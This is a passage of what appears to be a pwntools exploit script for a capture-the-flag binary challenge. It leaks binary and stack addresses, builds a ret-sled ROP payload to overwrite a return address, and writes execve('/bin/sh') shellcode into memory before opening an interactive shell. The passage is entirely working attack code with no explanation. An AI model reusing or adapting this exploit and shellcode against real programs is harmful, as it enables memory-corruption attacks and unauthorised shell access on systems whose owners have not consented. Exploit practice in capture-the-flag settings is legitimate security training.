    print("payload2:", payload.hex())
    free_write(0x3FFFFFFF-1-0x1000, len(payload), payload)
    fixed_space()
    fixed_read(0)
    p.recvuntil(b"Output: ")
    bin_leak = u64(p.recv(8))
    bin_base = bin_leak - 0x1240
    print("bin_leak:", hex(bin_leak))
    print("bin_base:", hex(bin_base))
    fixed_back()
    
    # gadgets
    ret = bin_base + 0x1298
    one_gadget = libc_base + 0x5eb99
    # try rop
    ret_addr = stack_leak - 0x200 + 0xd8
    shellcode_addr = stack_leak - 0x580
    payload = b"\x00"*((0x100-5)%8) + p64(ret) * (0xf8//8) +p64(shellcode_addr)[:5]
    write_primitive(ret_addr+0xf8-(0x100-5), payload, True)
    shellcode = b'jhH\xb8/bin///sPH\x89\xe7hri\x01\x01\x814$\x01\x01\x01\x011\xf6Vj\x08^H\x01\xe6VH\x89\xe61\xd2j;X\x0f\x05'
    if check_payload(shellcode):
        print("good shellcode")
    else:
        print("bad shellcode")
    free_space()
    free_write(0, len(shellcode), shellcode)
    free_back()

    print("shellcode_addr:", hex(shellcode_addr))
    print("ret_gadget:", hex(ret))
    
    p.interactive()

if __name__ == "__main__":
    exp()